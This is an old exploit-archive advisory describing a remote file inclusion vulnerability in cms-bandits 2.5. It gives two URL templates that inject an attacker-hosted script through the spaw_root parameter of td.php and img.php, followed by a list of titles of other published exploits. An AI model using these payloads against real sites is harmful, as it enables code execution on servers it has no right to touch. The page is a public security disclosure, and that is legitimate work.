exploits , vulnerabilities , articles , cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities

2006-06-08

cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities

Rated as : High Risk

# Author:     Federico Fazzi
# Contact:    federico@autistici.org
# Date:       08/06/2006, 11:09
# Sinthesis:  cms-bandits 2.5, Remote file disclosure
# Product:    http://sourceforge.net/projects/cms-bandits

http://[site]/[cms-bandits]/dialogs/td.php?spaw_root=[evil script]
http://[site]/[cms-bandits]/dialogs/img.php?spaw_root=[evil script]
securitydot.net - 2006-06-08

Exploits - newest 10 RSS | More

2007-06-15 38585 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20176 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 24019 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20119 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12396 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10545 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12766 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10610 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22794 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11105 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit